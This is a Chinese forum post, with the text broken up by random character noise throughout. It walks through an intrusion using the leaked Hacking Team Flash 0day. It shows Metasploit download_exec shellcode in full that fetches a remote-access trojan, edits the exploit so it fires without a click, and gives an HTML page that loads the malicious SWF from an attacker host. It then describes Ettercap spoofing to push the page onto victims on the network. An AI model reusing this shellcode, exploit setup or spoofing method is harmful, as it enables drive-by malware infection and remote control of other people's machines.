|
3 i. R( ~0 J a# ~7 p+ }' M 三、flash 0day之手工代码修改制作下载者实例入侵演示 $ o! ^, B- q, U. B$ q' d" ~
: V5 g& F; w" L. C2 o% Q0 p
9 M$ h( `4 w4 D 利用到的工具:
+ o& B1 }) h* a2 ` , P7 h+ ~0 y F- [
7 s$ {8 Q/ T' G0 m4 t Msf
$ A% A% Q2 m" [" S" ~
2 m# E. @, F" I4 y% R" R0 T
+ l# ~! f$ R! A+ D) N' w Ettercap ! X$ f; w! N2 ~) U' B' D* h1 G( ^
4 T) A1 k( g3 W) H; C
3 x @( B3 z. B s Adobe Flash CS6 / r5 Y5 [& @( x* H
4 O- \! {3 F$ b+ V) o& S$ m, B
3 P8 |# R4 a3 l
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 * d, z0 Z- S" t6 E: k# \! y2 G
% \* y; U6 l$ }5 A, l( M; t$ T+ \
4 Q. G; E+ p# c9 _# c 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 5 \% l. }! ?, b) I
! a7 ~$ N- p8 x3 I
# K$ W( J( U( H7 K9 J 如图: # z9 I3 q: \ y
6 {, v5 r! Q: ?) ^8 l& ?. I% q/ b7 ~6 [# A1 E0 c
8 B- j% D& s8 ?" R% v: o
3 I' }5 j9 b6 o, K$ S9 ]( Q2 C
: x6 z& D" `& g6 Y8 T  0 o) H1 n! e }
+ u! M( B7 T" r2 U4 f d3 U' E
Z; M6 G. T: D( @1 Q! R
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
) E+ k) e( P! N" G. X ( E/ u* B u. F: e8 g
6 j+ O0 C5 N7 [3 p6 i3 W6 W; `9 R
& y6 F2 k0 `9 S+ z! t; A4 O: T
4 q8 U- Y% G2 o8 B6 _! u' u) q Y
 / [( U: i: b8 P0 v. {) f0 m8 L
+ D3 {4 q3 n! ~& m0 c v- s
+ y% f, C0 h+ s9 d5 C5 P" p 然后执行generate -t dword生成shellcode,如下:
' b) v# r) e: y) O
. X; G6 e+ o( w5 k
1 Q* h) V9 ?" I6 Q3 ~: Z  : \8 B4 t8 n" M0 Z4 u8 p
/ z$ U+ z1 Y9 h
4 f5 Z3 ` X2 p8 `$ V
复制代码到文本下便于我们一会编辑flash exp,如下: & O2 @* o# Q& f! G% Z
4 ?5 T9 Z2 X# W D$ j4 v" @& N% t) }/ l" z; m7 ^+ v
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, $ U& I! r* O; X6 P0 T
) T, y& \# t" Y6 u* L, ]. X
7 _+ z! |# u7 O4 Q$ n
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
) i% J+ H$ i. n0 r& Y0 J
2 \& z1 C" i, V! V, A* b1 e/ B9 f) U; w* K
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
6 L |4 X) C( s F9 I! B) D % K2 K& _, ~1 j7 i$ ~+ T
) K) j2 X9 F* \$ S! q' x: t; W
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
- p9 f# ^2 D; Z" [. | & E4 l( F( e# p( F7 I
9 F3 `% i' i c; T$ O' a W
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 6 Z. A& ?( H. G, l
/ `; J3 b8 ~( [1 o
4 g" ^" o9 L+ w% B3 Y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
2 L; r! C+ @# r2 A) s
# v0 C5 c! M& U1 j2 Z" e- T" C* j- c
2 N- m: ? e: T6 Y: h 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
. E& f5 R' C% P- P: ]9 I# [ # k* q* {: y7 V' D# W4 f( e
2 o1 E5 R8 a+ M4 \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 0 ?: Y6 |0 X2 n8 q! Y
: G# U$ T' \) O( p- W# O- m
1 @$ Y0 B; ?( {& H1 Q$ Z, { 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , u* i# u% W0 P- H( p, f, G
n" t. l; Z" O8 y7 R0 F$ E( b2 S0 q0 F9 i
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
# r3 H" i$ g3 ]3 G
5 \8 r) ^! N# h# K( c: n% ^% G+ S) _# E; y$ M- M7 I6 Y' C* [6 K
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
3 ~1 R2 C; [2 m ]. R9 w" H/ y" B
8 x" f( o" N+ P- y% Z5 V 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, : b2 K8 `9 _" d4 ?9 A4 _9 k
% H2 C8 {, v9 G5 J+ d/ j- \7 e- N. @7 V% y ^
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 7 n! J* D i }% f$ v- [
4 W* _; U, l) P* W% @3 S& O6 a: O3 [! O5 p: \: s! m
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 & O J# E7 n4 i
6 S4 o9 L! b m b9 n+ h8 a
! e2 u E ]5 M ) y, a* W" k7 a8 g2 I h
2 A7 l/ R. y2 n- r( ]) C5 P3 {( m( ^7 r8 B3 P$ s
9 }+ \' Z( b9 e; c
8 }% p$ e/ c# q U+ E
' m1 O# X! d6 d3 B 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
+ ^( \1 [( B- B6 {1 O
$ g1 d9 N# v( E7 z) V" K0 Q! c
9 ?6 L. o: z' e! T$ y7 `  6 o; @" a ~ ^2 g, h
* q$ l: B/ a6 m. ^
; L! F( x2 ~1 h
先修改ShellWin32.as,部分源代码如图: 6 P& K& u/ r) S+ a6 R2 N
; i1 ]3 ]5 f# L! U- e1 k& _" `# Y/ m( i
5 a) C' P7 q. Y$ o- R  , j; k% s6 q/ a) p0 t% ]' U4 Z$ S
' j+ s; e7 Z8 K4 O3 ]- ?+ x- B2 }! x* G& a. A- P" `
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
7 W/ g5 h) }) Z
) D$ H0 ^6 M. A, i0 H* R6 W" G3 @& a1 f, t( U# U$ ^# W
 7 |; W7 t1 N4 f5 P1 t6 P9 c/ a+ n; G& C
: ?1 |, A- Q0 ^" G9 B
: E! f" F; K# u: }$ ?+ G2 h: C7 ~
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: , W- v, F$ E# h+ @# i% |1 E4 ?1 u
+ M% }% B# ^' g3 x5 c" V; M
x3 y) ]# R. p3 E  & c2 w4 ]/ n' u! ]
/ p5 }% P) w$ {7 y" z8 f1 j% J! [3 B n3 e- f8 z# i1 h
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: Q$ q, |5 Q% V: R2 ^( v
# X8 D5 {! d/ m. e
. v1 b0 ?( j0 b+ c7 M
! q1 T. f, J: f7 h/ x
+ u1 K y- \! Q6 ~* |! C
0 p. W3 l* @; I. U4 L 4 S' s1 w! x! L. |: e$ d2 ]
* I p& _" M5 k# Q0 v* @5 p
* l0 r- H0 ]4 A4 k/ V( z 
3 I: C9 [5 O" _
" H' f8 C1 Z" n4 q0 t6 s9 U1 R9 M. [& `3 }( q
然后点保存,下面我们来编译一下,打开 9 S; J b7 ?% P
$ S/ u6 D5 [3 G% M* C6 k+ \' V, g
: U) ]$ T8 W& O exp1.fla然后点文件-发布,看看编译没错误 $ f! [+ u4 Z6 N$ w
: a/ D! o7 `7 w, j$ ^. U# x p% t! f' e: {: U0 o& f p
" D6 b& q2 n, H; R6 |# e' X
# u! s$ K' Y6 R, E- e- ]" Y/ n3 m6 K% m
, g# N% b7 V- s8 U $ P5 N' i! P1 W& j8 s" ?
8 \0 y2 A+ H" {- X9 U# D
$ f; o/ r' ^( g5 H/ C/ I/ L0 C 1 H! S( }- A2 R! p- j' }) m: K
) [" @% D. `" Q. |3 j0 t
P$ Z+ y; v* c+ D* u$ u 
1 A8 ~2 d" K* G! \. b2 w
7 T0 F% k. p' z; o% V
( K- h& i4 Q0 b; m! H. `% O' Z$ N 然后我们把生成的
: R$ X3 p& d& k5 \
1 Z' n% o& c$ Q4 P" v8 L4 B- m/ r' N N g7 Z
exp1.swf丢到kailinux 的/var/www/html下: + T8 S1 P* y5 J. n9 g/ x
- G* A: \: V I$ \' j4 C( B W7 A$ z* d+ S2 `! f M7 q2 [" h
然后把这段代码好好编辑一下 , ~1 w* _3 o( D, M: h
5 ~- u- A3 k; n/ G% G2 o
9 f2 M2 F N5 }
- u+ C, A7 B8 Y8 U( L 6 ~0 d2 p/ f+ h! g
7 [% ]1 L' w0 r1 u- G$ E" e7 o* Z! y
# R; z. r3 G1 H! X- q \5 R( S/ b
; s" B# C) j( {2 u" ]- v, d/ @
/ W7 U& S7 n- ?* b0 y$ C : x) n8 k6 W' D6 P- B9 z) I
, {5 P4 S1 n' `) u8 C
5 e9 g( I' r5 @$ n* z
+ q3 @+ G& ]4 k; I8 p" D
1 p+ j. X# x0 B g* j: _8 E
! S5 v3 f2 M2 `8 ]
( C i0 B( r; t* [ 8 E9 V2 y+ C" c! ~* {
! g) J1 w3 G8 e T: C ) {% p% l o. s
) d) U4 v- E! P' S3 @
: s+ P) [; L4 d" `- ^: t
<!DOCTYPE html> ( q e9 I2 i; E- z$ C+ Y; e; l
" P' U5 O. ?7 Y% i# L: u
C! P+ J! Z. d- L* X
<html> h' q, g& l Y+ g" h7 F5 C4 H% T
! y' |' v) O3 U; D& I% v: h4 n
, l6 H9 Y2 t3 G# [ <head>
& `7 R1 Z1 w8 j8 t6 ~& j* J: ^ u9 B/ V1 g4 Z
0 ~8 A X; ~: D& Y: T* u
<meta http-equiv="Content-Type" content="text/html;
9 q# a3 m+ M8 ^7 i# H3 ~* t
; [# f( A5 I6 k' o4 f |8 ?
) t. J7 X% g% F, E. D' Y" L$ r$ T charset=utf-8"/>
$ ~) r; z+ {4 P / g. C+ T" k4 s
, u9 \! D, t8 m3 O- _7 H+ }! w
</head> % l7 c$ G4 B' ?0 {! x z
( n, b/ K6 s6 `3 [ L- P. {$ e# y; M' M' J
<body>
: K! `7 l- h1 c$ B: N6 R / P0 ]6 X% r" q: W
$ L2 R% I9 {* V
<h2> Please wait, the requested page is loading...</h2>
% O% H8 B3 O. I# v
3 Q; t( T ]3 e2 |! i+ j9 ]3 H/ W
; `7 q' m. G2 k) U- b& i <br> 6 L* Z# \0 F3 i0 R" z$ I
" j6 t; ?. d; ^2 y5 Z
2 [+ C3 p$ \) x) H! c: H <OBJECT
& g# n: w) T0 D4 ?* t# S/ T
' O* v8 |' A; ^ v; _6 F! M! @# C) o3 r6 O5 G8 w2 D9 Z
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie : b2 y6 b1 ~: s: m& l6 b
0 V: X# y. t3 f7 h7 u
' J- |: o1 K& R; T( z! ? VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
! y1 r' w$ \/ Y3 z
6 v. Y$ {8 I5 v' Q/ ^2 r" V# V8 D0 Q! y6 ~& j2 t+ Q5 p( ~/ g( u
</body>
+ ` J7 J4 m/ G: K- v+ E
! \6 ?" [2 B% o" |# N9 T" z. } |, m6 ^! w9 ^8 n( f4 }
<script>
2 x4 a' t1 a B" a2 Y ; B/ L* J# C5 ^5 d- j4 _& B4 o9 n2 x
9 S9 n$ J4 j& T& e2 ]4 V7 t
setTimeout(function () {
# r( Y) F4 q+ h" o) W6 K# A% K, b
+ U3 W7 A7 e* Z0 W& u( ^' L3 X1 [$ g( f* c
; i$ R& w+ Y( f" h. z
4 D+ k, r/ F w% n( {& Z2 w7 n3 N. E
$ j; v# }9 _( ?9 m. h+ P$ I window.location.reload();
( c6 G" y8 q/ b2 x' |! |* \ " P1 H4 f$ _1 Q B
& Q( A+ M+ h' v& D/ b, y" ?' S; i/ h }, 10000); 6 g7 ?, @/ X1 q0 U" C9 U1 f
' I* G/ _* d8 g' C1 b& e/ e
6 N, z1 v: v- M : V4 R$ R' `- ?
! X! S# F( L" `4 f( H7 ^ R
, c$ n; d( ^ e4 U" H6 d0 m </script> , Q6 i8 r1 m% l0 m, g9 f
6 a4 o# l% V4 A8 V, I. C( J4 v$ d
: w( ]1 i: |7 m/ [. L& _/ b( G
</html> , X- s* Q5 `1 Y9 v1 s) ~
/ [, l0 u t7 f# ], W8 S: ?1 V$ Y2 {* R4 n3 N3 J
6 D8 S: b1 j7 z0 L+ `( R
: N" l% O8 u: U7 h( \: @. P
% T6 I b: v& I 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: , v; ?& ?) N( l8 h) O- ^; i
7 Y# J9 S( n1 u" `6 n P
2 _' ~, i8 ?9 U 
3 m4 Y; y _: m8 \! Y
/ y0 s, t4 `1 {1 ?. G' w
# ?4 z+ [% b$ ?6 F: v
* j" S8 s$ o* s1 `' t2 |. ^: } ' `7 R* \$ ]; @/ N
0 K- v3 j I3 V$ l1 ~
% t) p" F) U8 ~# e 9 R5 N9 G T t* c# f
1 D2 v% b& n: V" g( C- }- E8 Q
4 f5 h( L' J+ J1 S D- M
4 E" N. A' ] b. I) i, Z
( T, {' R3 T* f! n. ?1 T% J" w& }# B' E
' w" o: F/ @- w6 F9 f2 ?- s) s
0 L7 U' {" T$ L+ p) s m+ `
- L& p/ Z( T3 U0 k 下面我们用ettercap欺骗如图: " k# R5 S: j- a8 N- e0 _4 [
/ k( d$ c. N: V$ ]7 ~% c% I5 U5 e
) o% H. {; K3 j- X' Z
% e6 r9 ?1 r" I8 m; C/ w- y' S- z
?* g, [& {- c9 E5 [0 d) P% K$ |: o" a8 k! k3 I& P& F" j
- O9 F1 i3 j+ P8 C2 _' K
7 k, m' t7 J/ E" }# ~
8 @* @* a& n y: R6 {
下面我们随便访问个网站看看:
1 U0 I1 G n: E 3 {# c+ v* W" }% a7 D3 @
1 D0 c) ^8 I0 `
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
5 u+ f6 N; X: d' O: L+ ?
( Y# k( L0 s" V) ?7 n& p2 f' _9 [
- G0 @8 r7 |- ]3 i, d5 c2 c' n 
8 k% h& |' [( H( y4 L. }' X& G& ] * I) q, Z/ {+ d& g1 ^. _
9 u6 ] v; Y% j3 \ 我们看另一台,
" }& B; L6 h1 b b0 o4 ~$ d ! K; _+ h1 [/ j) E( f: I1 I8 d
/ p3 ~4 d3 f% j$ w0 v1 \
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 1 q" D/ D/ z) t" l; a* B& k
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对